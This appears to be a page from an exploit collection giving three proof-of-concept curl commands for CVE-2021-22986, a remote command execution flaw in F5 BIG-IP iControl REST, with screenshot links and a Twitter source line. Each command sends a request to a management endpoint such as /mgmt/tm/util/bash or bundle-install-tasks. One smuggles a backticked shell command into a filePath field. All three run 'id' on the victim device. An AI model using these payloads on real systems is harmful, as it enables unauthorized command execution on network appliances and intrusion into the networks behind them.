# (CVE-2021-22986) F5 BIG-IP iControl RCE
================
PoC #1
“`bash
curl -su admin: -H “Content-Type: application/json” http://[victimIP]/mgmt/tm/util/bash -d ‘{“command”:”run”,”utilCmdArgs”:”-c id”}’
“`
![](/static/qingy/(CVE-2021-22986)_F5_BIG-IP_iControl_RCE/img/1.png)
PoC #2
“`bash
curl -ks https://[victimIP]/mgmt/shared/authn/login -d ‘{“bigipAuthCookie”:””,”loginReference”:{“link”:”http://localhost/mgmt/tm/access/bundle-install-tasks”},”filePath”:”`id`”}’
“`
![](/static/qingy/(CVE-2021-22986)_F5_BIG-IP_iControl_RCE/img/2.png)
PoC #3
“`bash
curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”id”}’
“`
![](/static/qingy/(CVE-2021-22986)_F5_BIG-IP_iControl_RCE/img/3.png)
`来源:https://twitter.com/wugeej/status/1372392693989445635`
请登录后查看评论内容